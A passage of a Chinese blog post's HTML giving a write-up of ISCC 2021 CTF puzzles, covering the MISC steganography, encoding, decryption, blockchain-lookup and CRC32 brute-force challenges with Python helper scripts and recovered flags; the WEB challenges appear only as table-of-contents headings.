<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>ISCC 2021 WP | 夏日 の blog</title><meta name="description" content="ISCC 2021 WP"><meta name="keywords" content="CTF-WEB"><meta name="author" content="夏日"><meta name="copyright" content="夏日"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/img/favicon.ico"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="https://fonts.googleapis.com" crossorigin="crossorigin"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><meta name="twitter:card" content="summary"><meta name="twitter:title" content="ISCC 2021 WP"><meta name="twitter:description" content="ISCC 2021 WP"><meta name="twitter:image" content="https://zss192.github.io/img/post/8.jpg"><meta property="og:type" content="article"><meta property="og:title" content="ISCC 2021 WP"><meta property="og:url" content="https://zss192.github.io/2021/05/25/ISCC%202021%20WP/"><meta property="og:site_name" content="夏日 の blog"><meta property="og:description" content="ISCC 2021 WP"><meta property="og:image" content="https://zss192.github.io/img/post/8.jpg"><script src="https://cdn.jsdelivr.net/npm/js-cookie/dist/js.cookie.min.js"></script><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="canonical" href="https://zss192.github.io/2021/05/25/ISCC%202021%20WP/"><link rel="next" title="2016年第七届蓝桥杯C/C++B组省赛题目解析" href="https://zss192.github.io/2021/04/13/2016%E5%B9%B4%E7%AC%AC%E4%B8%83%E5%B1%8A%E8%93%9D%E6%A1%A5%E6%9D%AFCB%E7%BB%84%E7%9C%81%E8%B5%9B%E9%A2%98%E7%9B%AE%E8%A7%A3%E6%9E%90/"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: {"defaultEncoding":2,"translateDelay":0,"cookieDomain":"https://xxx/","msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"簡"},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime_unit: '天',
  runtime: true,
  copyright: undefined,
  ClickShowText: {"text":"欢迎你,来到,我的博客","fontSize":"15px"},
  medium_zoom: false,
  fancybox: true,
  Snackbar: undefined,
  baiduPush: false,
  highlightCopy: true,
  highlightLang: false,
  highlightShrink: 'false',
  isFontAwesomeV5: false,
  isPhotoFigcaption: false
  
}</script><script>var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isSidebar: true  
  }</script><noscript><style>
#page-header {
  opacity: 1
}
.justified-gallery img{
  opacity: 1
}
</style></noscript><script src="/js/sakura.js"></script><meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="夏日 の blog" type="application/atom+xml">
</head><body><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="/img/avatar.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">75</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">11</div></a></div></div><div class="mobile_data_item is-center">     <div class="mobile_data_link"><a href="/categories/"><div class="headline">分类</div><div class="length_num">9</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/messageboard/"><i class="fa-fw fa fa-coffee"></i><span> 留言板</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> 关于</span></a></div></div></div></div><i class="fa fa-arrow-right on" id="toggle-sidebar" aria-hidden="true">     </i><div id="sidebar"><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">1.</span> <span class="toc-text">MISC</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9D%8E%E5%8D%8E%E7%9A%84%E7%BA%A2%E5%8C%85"><span class="toc-number">1.1.</span> <span class="toc-text">李华的红包</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Retrieve-the-passcode"><span class="toc-number">1.2.</span> <span class="toc-text">Retrieve the passcode</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B5%B7%E5%B8%82%E8%9C%83%E6%A5%BC-1"><span class="toc-number">1.3.</span> <span class="toc-text">海市蜃楼-1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BE%8E%E4%BA%BA%E8%AE%A1"><span class="toc-number">1.4.</span> <span class="toc-text">美人计</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%88%91%E7%9A%84%E6%8A%98%E6%89%A3%E6%98%AF%E5%A4%9A%E5%B0%91"><span class="toc-number">1.5.</span> <span class="toc-text">我的折扣是多少</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8C%BA%E5%9D%97%E9%93%BE"><span class="toc-number">1.6.</span> <span class="toc-text">区块链</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Hack-the-Victim"><span class="toc-number">1.7.</span> <span class="toc-text">Hack the Victim</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%A3%80%E6%9F%A5%E4%B8%80%E4%B8%8B"><span class="toc-number">1.8.</span> <span class="toc-text">检查一下</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%8F%E6%98%8E%E7%9A%84%E5%AE%A0%E7%89%A9%E5%85%94"><span class="toc-number">1.9.</span> <span class="toc-text">小明的宠物兔</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%98%E5%BC%82%E7%9A%84SM2"><span class="toc-number">1.10.</span> <span class="toc-text">变异的SM2</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">2.</span> <span class="toc-text">WEB</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#ISCC%E5%AE%A2%E6%9C%8D%E5%86%B2%E5%86%B2%E5%86%B2%EF%BC%88%E4%B8%80%EF%BC%89"><span class="toc-number">2.1.</span> <span class="toc-text">ISCC客服冲冲冲（一）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%99%E6%98%AF%E5%95%A5"><span class="toc-number">2.2.</span> <span class="toc-text">这是啥</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web01"><span class="toc-number">2.3.</span> <span class="toc-text">Web01</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ISCC%E5%AE%A2%E6%9C%8D%E4%B8%80%E5%8F%B7%E5%86%B2%E5%86%B2%E5%86%B2%EF%BC%88%E4%BA%8C%EF%BC%89"><span class="toc-number">2.4.</span> <span class="toc-text">ISCC客服一号冲冲冲（二）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%99%BB%E5%BD%95"><span class="toc-number">2.5.</span> <span class="toc-text">登录</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#which-is-the-true-iscc"><span class="toc-number">2.6.</span> <span class="toc-text">which is the true iscc</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#lovely-ssti"><span class="toc-number">2.7.</span> <span class="toc-text">lovely ssti</span></a></li></ol></li></ol></div></div></div><div id="body-wrap"><div class="post-bg" id="nav" style="background-image: url(/img/post/8.jpg)"><div id="page-header"><span class="pull_left" id="blog_name"><a class="blog_title" id="site-name" href="/">夏日 の blog</a></span><span class="pull_right menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/messageboard/"><i class="fa-fw fa fa-coffee"></i><span> 留言板</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> 关于</span></a></div></div><span class="toggle-menu close"><a class="site-page"><i class="fa fa-bars fa-fw" aria-hidden="true"></i></a></span></span></div><div id="post-info"><div id="post-title"><div class="posttitle">ISCC 2021 WP</div></div><div id="post-meta"><div class="meta-firstline"><time class="post-meta__date"><span class="post-meta__date-created" title="发表于 2021-05-25 13:02:34"><i class="fa fa-calendar" aria-hidden="true"></i> 发表于 2021-05-25</span><span class="post-meta__separator">|</span><span class="post-meta__date-updated" title="更新于 2021-06-10 18:23:18"><i class="fa fa-history" aria-hidden="true"></i> 更新于 2021-06-10</span></time><span class="post-meta__categories"><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/CTF-WEB/">CTF-WEB</a></span></div><div class="meta-secondline"> <span class="post-meta-wordcount"><i class="post-meta__icon fa fa-file-word-o" aria-hidden="true"></i><span>字数总计:</span><span class="word-count">4.8k</span><span class="post-meta__separator">|</span><i class="post-meta__icon fa fa-clock-o" aria-hidden="true"></i><span>阅读时长: 21 分钟</span></span></div><div class="meta-thirdline"><span class="post-meta-pv-cv"><span class="post-meta__separator">|</span><i class="fa fa-eye post-meta__icon" aria-hidden="true"> </i><span>阅读量:</span><span id="busuanzi_value_page_pv"></span></span><span class="post-meta-commentcount"><span class="post-meta__separator">|</span><i class="post-meta__icon fa fa-comment-o" aria-hidden="true"></i><span>评论数:</span><a href="/2021/05/25/ISCC%202021%20WP/#post-comment" itemprop="discussionUrl"><span class="valine-comment-count comment-count" data-xid="/2021/05/25/ISCC%202021%20WP/" itemprop="commentCount"></span></a></span></div></div></div></div><main class="layout_post" id="content-inner"><article id="post"><div id="article-container"><h1>MISC</h1>
<h2 id="李华的红包"><a class="header-anchor" href="#李华的红包">¶</a>李华的红包</h2>
<p>打开发现是一个图片，binwalk分离下文件后得到一个txt文件，内容如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">24,43,13,13,12,21,43</span><br></pre></td></tr></table></figure>
<p>很明显是敲击码（如果改下图片大小为521*521会看到下面有个鼓也会提示这是敲击码）</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/f2ae75c5ad3e4a015f3b0a590c89a6dd.png"  alt="image-20210521131735744"></p>
<p>分别对应着ISCCBFS</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ISCC&#123;ISCCBFS&#125;</span><br></pre></td></tr></table></figure>
<h2 id="Retrieve-the-passcode"><a class="header-anchor" href="#Retrieve-the-passcode">¶</a>Retrieve the passcode</h2>
<p>解压后得到一个压缩包和一个名为scatter的txt文档</p>
<p>打开txt文档发现</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1:3:1;1.25:3:1;1.5:3:1;1.75:3:1;2:3:1;2:2.75:1;2:2.5:1;2:2.25:1;2:2:1;2:1.75:1;2:1.5:1;1:2.25:1;1.25:2.25:1;1.5:2.25:1;1.75:2.25:1;1:1.5:1;1.25:1.5:1;1.5:1.5:1;1.75:1.5:1;3:3:1;3.25:3:1;3.5:3:1;3.75:3:1;4:3:1;3.25:2.25:1;3.5:2.25:1;3.75:2.25:1;4:2.25:1;4:2:1;4:1.75:1;4:1.5:1;3:1.5:1;3.25:1.5:1;3.5:1.5:1;3.75:1.5:1;3:1.75:1;3:2:1;3:2.25:1;3:2.5:1;3:2.75:1;5:3:1;5.25:3:1;5.5:3:1;5.75:3:1;6:3:1;6:2.25:1;6:2:1;6:1.75:1;6:1.5:1;5.75:1.5:1;5.5:1.5:1;5.25:1.5:1;5:1.5:1;5:2.25:1;5.25:2.25:1;5.5:2.25:1;5.75:2.25:1;5:2.5:1;5:2.75:1;7:3:1;7.25:3:1;7.5:3:1;7.75:3:1;8:3:1;8:2.75:1;8:2.5:1;8:2.25:1;8:2:1;8:1.75:1;8:1.5:1;9:3:1;9.25:3:1;9.5:3:1;9.75:3:1;10:3:1;10:2.75:1;10:2.5:1;10:2.25:1;9.75:2.25:1;9.5:2.25:1;9.25:2.25:1;9:2.25:1;9:2:1;9:1.75:1;9:1.5:1;9.25:1.5:1;9.5:1.5:1;9.75:1.5:1;10:1.5:1;11:3:1;11.25:3:1;11.5:3:1;11.75:3:1;12:3:1;12:2.75:1;12:2.5:1;12:2.25:1;12:2:1;12:1.75:1;12:1.5:1;11.75:1.5:1;11.5:1.5:1;11.25:1.5:1;11:1.5:1;11:1.75:1;11:2:1;11:2.25:1;11:2.5:1;11:2.75:1;11.25:2.25:1;11.5:2.25:1;11.75:2.25:1</span><br></pre></td></tr></table></figure>
<p>三维数据还提示了scatter应该是用这些数据画图</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> matplotlib.pyplot <span class="keyword">as</span> plt </span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;scatter.txt&#x27;</span>,<span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> n:</span><br><span class="line">    <span class="built_in">all</span> = n.read()</span><br><span class="line">    a = <span class="built_in">all</span>.split(<span class="string">&quot;;&quot;</span>)</span><br><span class="line"></span><br><span class="line">x_value = []</span><br><span class="line">y_value = []</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> a:</span><br><span class="line">    x_value.append(i.split(<span class="string">&#x27;:&#x27;</span>)[<span class="number">0</span>])</span><br><span class="line">    y_value.append(i.split(<span class="string">&quot;:&quot;</span>)[<span class="number">1</span>])</span><br><span class="line"></span><br><span class="line">plt.scatter(x_value,y_value,s=<span class="number">20</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#显示</span></span><br><span class="line">plt.show()</span><br></pre></td></tr></table></figure>
<p>稍微改一下宽高**，<strong>得到一个这个东西</strong>，**看不出来是个啥</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/20210502005412635.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzUxMDc4MjI5,size_16,color_FFFFFF,t_70"  alt="在这里插入图片描述"></p>
<p>颠倒一下**，**得到密码365728</p>
<p>打开pdf</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/39fa8cbaab511371cc5c8a5d801b3999.png"  alt="image-20210518131743000"></p>
<p>很明显是摩斯密码</p>
<p>解密得到</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">CONGRATULATIONTHEFLAGIS</span><br><span class="line">CHALLENGEISCCTWOZEROTWOONE</span><br></pre></td></tr></table></figure>
<p>！坑点来了，两个解密的语句都是flag的一部分，当时我也是一直试CHALLENGEISCCTWOZEROTWOONE这个，大小写什么的都不行，后来看群里也有人被这个折磨疯了问到底是啥，有个人说两个都要，我才想到第一个也是flag的一部分，只能说这脑洞纯粹为了脑洞而脑洞。。。。</p>
<h2 id="海市蜃楼-1"><a class="header-anchor" href="#海市蜃楼-1">¶</a>海市蜃楼-1</h2>
<p>打开看着是一个docx文件，里面乱码。docx其实本质就是zip，直接改后缀为zip，然后解压</p>
<p>在文件里搜索flag即可（这里我用的是sublime）</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/5949a364b7066f9359ccc88c76378d1f.png"  alt="image-20210518132718171"></p>
<h2 id="美人计"><a class="header-anchor" href="#美人计">¶</a>美人计</h2>
<p>题目描述：美人说的话里有解题提示，但是美人的话不能全信。这句话很关键</p>
<p>用十六进制编辑器打开图片得到提示</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/5e850fac0fd0326813e29bd3a2bf7bee.png"  alt="image-20210518133033001"></p>
<p>大致意思是尝试AES，然后就会得到flag。还给了ISCC2021（估计是密钥）</p>
<blockquote>
<p>由于我是用的linux，没法像windows那样看图片属性里的详细信息，其实这个提示在windows下右键看图片的备注也可以看到</p>
</blockquote>
<p>解压后还有个word文档，是一个二维码，扫码后得到U2Fs开头的一段代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">U2FsdGVkX1&#x2F;Ka+sScszwQkwhO+VLiJwV&#x2F;6IFg5W+TfNHGxG2qZsIr2iwMwb9X9Iu 3GuGWmPOtO27z8vNppD2D50fwsD+8VWhdtW9J4cewYivH&#x2F;Z&#x2F;7GoUvcJXJMrvf+vu +CBqWDGp6HWd0e5whGhuzlK0ZtBcDZdPDSIHA7+GuUlifp8PcFCtJPgiuk143REE +pKFiSJXolXLR1vJCdGY9w5mXFbiWPrb2U7r&#x2F;v5noP8&#x3D;</span><br></pre></td></tr></table></figure>
<p>尝试AES解密，密钥是ISCC2021，成功解密但是得到的还是U2Fs开头的加密的内容，多次解密后得到flag</p>
<p>wait</p>
<p>怎么可能那么简单，太小看出题人的套路了，事实上是得到了这样一句话</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">y0u_h@ve_fal1en_intO_tHe_tr@p_0f_tHe_be@uty_!</span><br></pre></td></tr></table></figure>
<p>就是这样毫无防备的陷入了陷阱。。。</p>
<p>于是冥思苦想到底是哪错了</p>
<p>然后我把那个docx文档改成了zip解压后用sublime打开</p>
<p>然后发现了两个二维码，下面这个是打开word文档看到的</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/e50c8fbd5ea975a651ab6e7bca250417.png"  alt="image-20210518134433510"></p>
<p>下面这个是另外一个二维码</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/c0649d2394e0cd367b3486d58771a028.png"  alt="image-20210518134508339"></p>
<p>扫描后得到了又一段U2Fs开头的代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">U2FsdGVkX19eOY&#x2F;pDh8+vPAcvfkLi1XLUneVzjLLOMul53sKK8UpobdCOiPIv4KE</span><br></pre></td></tr></table></figure>
<p>尝试AES解密，然后提示解密失败</p>
<p>？？？？？？？？</p>
<p>然后尝试DES解密，密钥仍是ISCC2021，终于得到了flag</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/0719fa669b514ebfbdd2b4f1a6a9a39a.png"  alt="image-20210518134805104"></p>
<p>果然漂亮的女人信不得，给了个二维码、加密方式没一个是真的。。。</p>
<h2 id="我的折扣是多少"><a class="header-anchor" href="#我的折扣是多少">¶</a>我的折扣是多少</h2>
<p>运行exe文件得到pass1{\u006b\u0072\u0077}，Unicode编码，解码后为pass1{krw}</p>
<p>在压缩文件最后有一段base64编码</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/20210505003143992.png"  alt="在这里插入图片描述"></p>
<p>解出来是pass2{gcc666}</p>
<p>用密码krwgcc666解开压缩包</p>
<p>得到base编码：eW91Zm91bmRtZT8=</p>
<p>base64解出来是：youfoundme?</p>
<p>还剩下个mp3，MP3一般都是用MP3stego解密，密码是youfoundme?</p>
<p>得到ISCC{LFXXK4TENFZWG33VNZ2DELRRGU======}</p>
<p>其中LFXXK4TENFZWG33VNZ2DELRRGU======用base32解密得到<code>Yourdiscount2.15</code><br>
flag是ISCCP{Yourdiscount2.15}</p>
<p>这里推荐下我的一个base家族的脚本（可尝试base16、base32、base36、base58、base62、base64、base85、base91、base92）,这种base解密直接丢到脚本里，看哪个能解出来</p>
<p>链接地址：<a target="_blank" rel="noopener" href="https://download.csdn.net/download/zss192/12133420">Base家族加密解密.py</a></p>
<p>若没有积分可以评论留言邮箱私发给你</p>
<h2 id="区块链"><a class="header-anchor" href="#区块链">¶</a>区块链</h2>
<p>第一次接触区块链的题目，在网上看了很多基础的CTF区块链的题目</p>
<p>当时直接搜题目中的代码搜到了几篇文章，如<a target="_blank" rel="noopener" href="https://ashiq.co.za/posts/0x41414141-CTF-Blockchain-Writeups/">0x41414141 CTF区块链编写</a></p>
<p>虽然看着和这题差不多但按照他说的一直没解出来，但也提供了一些思路</p>
<p>然后在另一篇文章看到了类似的区块链题目，具体链接我也找不到了</p>
<p>打开这个链接：<a target="_blank" rel="noopener" href="https://rinkeby.etherscan.io/">Etherscan</a></p>
<p>在搜索框输入合约地址0x0ed72dfd4c63dd97df8fec07e5a6bba466c6adf5</p>
<p>然后点击这个地方</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/87bdfdf2058d257eaa8fb84ddfad870f.png"  alt="image-20210518140256588"></p>
<p>这里点击&quot;UTF-8&quot;</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/b0f24339ee129c739dddd4be9dfc1b2e.png"  alt="image-20210518140348846"></p>
<p>得到flag</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/0541cbfabecb92ea302292d27f959d10.png"  alt="image-20210518140409432"></p>
<h2 id="Hack-the-Victim"><a class="header-anchor" href="#Hack-the-Victim">¶</a>Hack the Victim</h2>
<p>和上题区块链类似</p>
<p>也是给了个合约地址：0x68D28fE315E6A344029D42915Fbc7af4261AB833</p>
<p>同样打开上述题目的网站，搜索这个合约地址</p>
<p>不过不同的是这题需要反编译</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/120760e12d07e05cd974bced772977ee.png"  alt="image-20210518140638282"></p>
<p>反编译后得到flag</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/f43afba5602e0a29e880ca73243d1070.png"  alt="image-20210518140707320"></p>
<h2 id="检查一下"><a class="header-anchor" href="#检查一下">¶</a>检查一下</h2>
<p>解压后得到一个png图片，binwalk下发现里面有zlib数据，尝试分离(binwalk -e)</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/296dc3abbb650b8571e506905a65ef1d.png"  alt="image-20210518140908156"></p>
<p>分离后有一个txt文档打开后发现是01字符串</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/372a533aa1160a821a557a6f4f170a56.png"  alt="image-20210518141009150"></p>
<p>联想到是01字符串画二维码</p>
<p>先看下字符串长度发现是841，而正好是29的平方，那应该就是二维码了</p>
<p>上脚本</p>
<blockquote>
<p>注：我总结了一些CTF杂项脚本：<a target="_blank" rel="noopener" href="https://github.com/zss192/CTF-python-script">https://github.com/zss192/CTF-python-script</a></p>
<p>觉得还可以的话给个star吧</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> PIL <span class="keyword">import</span> Image</span><br><span class="line">MAX = <span class="number">29</span>    <span class="comment">#宽高 841个01字符串，所以宽和高是29</span></span><br><span class="line">pic = Image.new(<span class="string">&quot;RGB&quot;</span>,(MAX, MAX))</span><br><span class="line"><span class="comment">#若是(255,255,255)、(0,0,0)需要先转换01 </span></span><br><span class="line"><span class="built_in">str</span> = <span class="string">&quot;1111111000100100110000111111110000010011011110010101000001101110100111010011010010111011011101000000111011110101110110111010010111101110001011101100000101110111000010010000011111111010101010101010111111100000000011100100110100000000100101101110000101010101000001101000011101011011011100101000001110010010001111011110010001100000101101100111111001010110101101110000100011110100110001001100010010101110000111111111110010100110101001111110010110001100110111110111000110011110010001111001110000100011010000110100100000001011001010101101110100011011010011100011101001111011111000101001101101101100101010001111101000000000011101101101010001011011111110000011110000101011010100000101011110010101000101101011101001010011001011111001010111010110101111000001101001101110100101010000010100111011000001000011101000011001001011111110100100100000111100110&quot;</span></span><br><span class="line">i=<span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> y <span class="keyword">in</span> <span class="built_in">range</span> (<span class="number">0</span>,MAX):</span><br><span class="line">    <span class="keyword">for</span> x <span class="keyword">in</span> <span class="built_in">range</span> (<span class="number">0</span>,MAX):</span><br><span class="line">        <span class="keyword">if</span>(<span class="built_in">str</span>[i] == <span class="string">&#x27;1&#x27;</span>):</span><br><span class="line">            pic.putpixel([x,y],(<span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>))</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            pic.putpixel([x,y],(<span class="number">255</span>,<span class="number">255</span>,<span class="number">255</span>))</span><br><span class="line">        i = i+<span class="number">1</span></span><br><span class="line">pic.show()</span><br><span class="line">pic.save(<span class="string">&quot;./flag.png&quot;</span>)</span><br></pre></td></tr></table></figure>
<p>得到二维码，扫码即可得到flag</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/fcac7cb6cb08c6515341469625f47e80.png"  alt="image-20210518141632248"></p>
<h2 id="小明的宠物兔"><a class="header-anchor" href="#小明的宠物兔">¶</a>小明的宠物兔</h2>
<p>下载附件发现是一个名为rabbit的图片，一个胖兔子说着我需要碰撞</p>
<p>用binwalk分离图片得到flag.txt和key.zip</p>
<p>flag.txt中内容为U2FsdGVkX18kNy7RlBvcV9WJsqa+oxvdd0Ir86U2cU2996N6ltZi7VVOaw==</p>
<p>显然需要密钥解密</p>
<p>打开key.zip发现其中的key.txt只有5字节大小结合那个兔子说的它需要碰撞应该是crc32碰撞</p>
<p>上脚本（Python2）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> binascii</span><br><span class="line"></span><br><span class="line">dic = <span class="string">&quot;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&amp;*()_+- =&#123;&#125;[]&quot;</span></span><br><span class="line">crc = <span class="number">0x3DACAC6B</span>  </span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> dic : </span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> dic:</span><br><span class="line">        <span class="keyword">for</span> p <span class="keyword">in</span> dic:</span><br><span class="line">            <span class="keyword">for</span> q <span class="keyword">in</span> dic:</span><br><span class="line">                <span class="keyword">for</span> a <span class="keyword">in</span> dic:</span><br><span class="line">                    s=i+j+p+q+a</span><br><span class="line">                    <span class="keyword">if</span> crc == (binascii.crc32(s) &amp; <span class="number">0xffffffff</span>):</span><br><span class="line">                        <span class="built_in">print</span> s </span><br></pre></td></tr></table></figure>
<p>CRC32可由一些压缩软件看到，也可以用十六进制编辑器看到</p>
<p>CRC32在这个位置，但注意的是要反过来即0x3DACAC6B</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/68478d30706be46c79ffa153887b77d2.png"  alt="image-20210518142412441"></p>
<p>由于5层循环，且未优化时间会长点，</p>
<p>解出来的第二个看着像是密钥，尝试下解密</p>
<p>结合图片名为rabbit，可能是rabbit加密，尝试下果然是，得到flag</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/440cf3e5e5a2e150d1761a52fe368b46.png"  alt="image-20210518144920078"></p>
